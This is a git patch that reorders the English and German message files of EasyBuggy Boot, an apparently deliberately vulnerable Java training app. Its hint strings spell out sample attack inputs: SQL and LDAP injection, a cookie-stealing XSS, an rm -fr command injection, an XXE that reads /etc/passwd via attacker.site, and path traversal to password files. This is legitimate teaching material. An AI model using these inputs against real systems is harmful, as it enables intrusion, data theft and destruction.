 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From a3c5cf8a03ceba899d2b69b00af7baad18baee84 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:33 +0900 Subject: [PATCH 031/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test 